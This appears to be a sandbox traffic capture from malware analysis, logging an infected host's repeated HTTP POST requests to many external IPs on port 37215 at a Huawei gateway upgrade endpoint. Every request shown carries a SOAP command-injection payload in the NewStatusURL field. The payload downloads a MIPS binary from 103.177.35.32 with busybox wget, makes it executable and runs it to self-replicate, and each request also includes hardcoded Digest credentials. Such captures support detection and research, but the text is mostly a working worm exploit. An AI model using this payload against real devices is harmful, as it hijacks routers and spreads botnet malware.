                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        237192.168.2.2340910197.97.160.18837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315973043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        238192.168.2.235140841.168.230.17037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315985918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        239192.168.2.234067896.164.189.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315992117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        240192.168.2.235742095.6.102.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316000938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        241192.168.2.2338804157.84.223.21637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316008091 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        242192.168.2.2349848223.202.108.2837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316008091 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        243192.168.2.2355740208.161.189.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316018105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        244192.168.2.2359974157.214.221.25137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316019058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        245192.168.2.2332918196.152.75.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316046000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        246192.168.2.2348374157.37.47.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316226959 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
